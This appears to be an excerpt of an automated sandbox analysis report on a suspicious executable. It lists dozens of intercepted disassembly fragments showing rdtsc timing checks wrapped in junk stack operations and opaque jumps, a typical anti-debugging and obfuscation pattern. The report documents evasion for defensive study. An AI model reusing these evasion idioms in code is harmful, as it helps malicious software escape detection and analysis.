              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAAA2C second address: EAAA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7F08BA1E3Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7F08BA1E47h 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAAA5E second address: EAAA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAAA62 second address: EAAA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F7F08BA1E4Fh 0x0000000c jmp 00007F7F08BA1E49h 0x00000011 jno 00007F7F08BA1E3Ch 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAABFE second address: EAAC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAAC04 second address: EAAC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAAC0A second address: EAAC13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAAC13 second address: EAAC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E44h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F7F08BA1E44h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EA0DED second address: EA0DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EAFA2E second address: EAFA3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E3Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB00A0 second address: EB00A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB00A4 second address: EB00A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB00A8 second address: EB00AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB00AE second address: EB00D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F08BA1E44h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F7F08BA1E36h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB134A second address: EB136C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F08F64199h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB136C second address: EB13AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jnp 00007F7F08BA1E36h 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F7F08BA1E4Bh 0x00000017 jmp 00007F7F08BA1E42h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB13AA second address: EB13AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB13AF second address: EB13B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB3664 second address: EB366B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E816C9 second address: E816CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB4CAB second address: EB4CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB4CAF second address: EB4CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Fh 0x00000007 jmp 00007F7F08BA1E48h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E69D5F second address: E69D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB93AC second address: EB93D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E3Dh 0x00000009 pop ebx 0x0000000a jmp 00007F7F08BA1E49h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB93D7 second address: EB93DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB93DD second address: EB93E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F08BA1E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB9545 second address: EB9549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB9549 second address: EB9563 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB9887 second address: EB988B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB988B second address: EB988F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB988F second address: EB98B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7F08F64186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F7F08F64198h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB98B7 second address: EB98D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E47h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB98D4 second address: EB98D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB9BC3 second address: EB9BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F7F08BA1E36h 0x0000000d jg 00007F7F08BA1E36h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBA4D3 second address: EBA541 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F7F08F64197h 0x00000010 pop ecx 0x00000011 popad 0x00000012 add dword ptr [esp], 1E1139F5h 0x00000019 call 00007F7F08F64189h 0x0000001e jne 00007F7F08F64190h 0x00000024 push eax 0x00000025 jmp 00007F7F08F64198h 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7F08F6418Bh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBA541 second address: EBA56A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F7F08BA1E3Ch 0x00000013 jnl 00007F7F08BA1E36h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBA56A second address: EBA58C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F08F6418Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F7F08F6418Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBA9A7 second address: EBA9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA4E second address: EBAA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA52 second address: EBAA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA58 second address: EBAA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64195h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA71 second address: EBAA8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F7F08BA1E3Bh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA8B second address: EBAA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7F08F64186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBABC0 second address: EBABCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBB441 second address: EBB445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBB445 second address: EBB449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBB71E second address: EBB722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBB7BC second address: EBB7C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBD4A5 second address: EBD4AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBD4AA second address: EBD51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D321Ah], edi 0x00000010 push 00000000h 0x00000012 ja 00007F7F08BA1E3Ch 0x00000018 jmp 00007F7F08BA1E49h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F7F08BA1E38h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 jne 00007F7F08BA1E3Ch 0x0000003f add esi, dword ptr [ebp+122D363Dh] 0x00000045 xchg eax, ebx 0x00000046 push edi 0x00000047 pushad 0x00000048 jbe 00007F7F08BA1E36h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDEE3 second address: EBDEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7F08F64186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDD91 second address: EBDD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDEED second address: EBDF0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64192h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDD95 second address: EBDD9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDF0B second address: EBDF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDD9B second address: EBDDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDF0F second address: EBDF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F7F08F64188h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D35CDh] 0x00000028 clc 0x00000029 push 00000000h 0x0000002b ja 00007F7F08F6418Bh 0x00000031 push 00000000h 0x00000033 stc 0x00000034 push eax 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBE6DF second address: EBE704 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F08BA1E3Ch 0x00000008 jng 00007F7F08BA1E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7F08BA1E42h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC0BF7 second address: EC0BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC0BFC second address: EC0C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F7F08BA1E36h 0x00000009 jnp 00007F7F08BA1E36h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jl 00007F7F08BA1E36h 0x0000001c pop esi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC0C19 second address: EC0C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC2B96 second address: EC2BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F7F08BA1E3Ch 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC0C1F second address: EC0C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7C601 second address: E7C609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7C609 second address: E7C60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECB30E second address: ECB312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECC386 second address: ECC38B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECD354 second address: ECD358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECD358 second address: ECD3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F7F08F64199h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jmp 00007F7F08F6418Fh 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D3471h], ecx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F7F08F64188h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov bx, di 0x0000003f xchg eax, esi 0x00000040 jbe 00007F7F08F6418Eh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECD3C6 second address: ECD3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECC622 second address: ECC627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECE471 second address: ECE485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E40h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECE485 second address: ECE4EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jnl 00007F7F08F64188h 0x00000010 pop ebx 0x00000011 nop 0x00000012 and edi, 040836BCh 0x00000018 mov dword ptr [ebp+122D24A5h], ecx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 add bx, 9A0Ah 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 mov dword ptr [ebp+12486EEAh], esi 0x00000037 jmp 00007F7F08F64192h 0x0000003c mov eax, dword ptr [ebp+122D1451h] 0x00000042 sub bx, D359h 0x00000047 push FFFFFFFFh 0x00000049 mov edi, dword ptr [ebp+122D1FB0h] 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jnl 00007F7F08F64186h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECE4EE second address: ECE4F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED12D6 second address: ED12E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED12E7 second address: ED12ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22C2 second address: ED22C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22C7 second address: ED22D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22D5 second address: ED22D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22D9 second address: ED22DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22DF second address: ED22E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECF3D9 second address: ECF40B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F7F08BA1E43h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECF4D3 second address: ECF4FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F7F08F641BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F08F64198h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED62AC second address: ED6341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F7F08BA1E36h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F7F08BA1E3Fh 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7F08BA1E38h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D35F9h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F7F08BA1E38h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 ja 00007F7F08BA1E3Bh 0x00000057 mov edi, dword ptr [ebp+122D1C16h] 0x0000005d push 00000000h 0x0000005f mov ebx, dword ptr [ebp+122D3915h] 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F7F08BA1E43h 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED6341 second address: ED6347 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED14F3 second address: ED1507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7F08BA1E3Bh 0x0000000e rdtsc
